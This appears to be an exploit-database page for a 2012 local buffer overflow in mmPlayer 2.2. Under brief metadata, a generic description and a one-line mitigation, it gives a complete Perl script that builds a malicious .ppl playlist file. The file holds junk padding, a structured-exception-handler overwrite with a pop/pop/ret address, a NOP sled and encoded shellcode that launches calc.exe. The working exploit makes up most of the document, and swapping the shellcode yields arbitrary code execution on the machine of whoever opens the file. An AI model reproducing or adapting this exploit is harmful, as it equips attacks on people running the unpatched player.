mmPlayer 2.2 (.ppl) Local Buffer Overflow Exploit (SEH)

vendor:

mmPlayer

by:

RjRjh Hack3r

7,8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: mmPlayer

Affected Version From: 2.2

Affected Version To: 2.2

Patch Exists: NO

Related CWE: N/A

CPE: 2.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP2 (EN)

2012

mmPlayer 2.2 (.ppl) Local Buffer Overflow Exploit (SEH)

This exploit is for mmPlayer 2.2 (.ppl) Local Buffer Overflow Exploit (SEH). It is a type of attack wherein the perpetrator sends malicious data to the vulnerable application. The application then tries to process the malicious data and execute it, resulting in a buffer overflow. The malicious data is sent in the form of a specially crafted file, which when opened by the vulnerable application, causes the buffer overflow.

Mitigation:

The best way to mitigate buffer overflow attacks is to use secure coding practices. This includes using secure coding libraries, avoiding unsafe functions, and using secure coding techniques such as input validation.

Source

Exploit-DB raw data:

#!/usr/bin/perl
# Title: mmPlayer 2.2 (.ppl) Local Buffer Overflow Exploit (SEH)
# Date: 23.03.2012
# Author: RjRjh Hack3r
# Software Link: http://www.brnameg.com/download.php?id=3859
# Tested on: Windows XP SP2 (EN)

my $file= "RjRjh.ppl";
my $junk= "\x41" x 4090;
my $next_seh= "\xEB\x06\x90\x90";
my $seh= "\x23\xC0\xB4\x76"; # pop/pop/ret 0x76B4C023 (winmm.dll) EBX
my $nop = "\x90" x 20;

# calc.exe
my $buf =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x30\x42\x30\x42\x30\x4b\x48\x45\x34\x4e\x53\x4b\x48\x4e\x47".
"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x34\x4a\x41\x4b\x58".
"\x4f\x35\x42\x32\x41\x30\x4b\x4e\x49\x34\x4b\x38\x46\x33\x4b\x38".
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c".
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x33\x46\x55\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x58".
"\x4f\x55\x46\x32\x41\x30\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54".
"\x4b\x38\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x48".
"\x41\x30\x4b\x4e\x49\x38\x4e\x55\x46\x42\x46\x50\x43\x4c\x41\x43".
"\x42\x4c\x46\x56\x4b\x58\x42\x54\x42\x53\x45\x48\x42\x4c\x4a\x47".
"\x4e\x30\x4b\x48\x42\x34\x4e\x30\x4b\x38\x42\x57\x4e\x51\x4d\x4a".
"\x4b\x58\x4a\x46\x4a\x30\x4b\x4e\x49\x50\x4b\x58\x42\x38\x42\x4b".
"\x42\x30\x42\x30\x42\x30\x4b\x38\x4a\x46\x4e\x43\x4f\x45\x41\x53".
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37".
"\x42\x45\x4a\x56\x42\x4f\x4c\x38\x46\x50\x4f\x35\x4a\x56\x4a\x59".
"\x50\x4f\x4c\x48\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x36".
"\x4e\x36\x43\x36\x42\x50\x5a";
open($File,">$file");
print $File $junk.$next_seh.$seh.$nop.$buf;
close($File);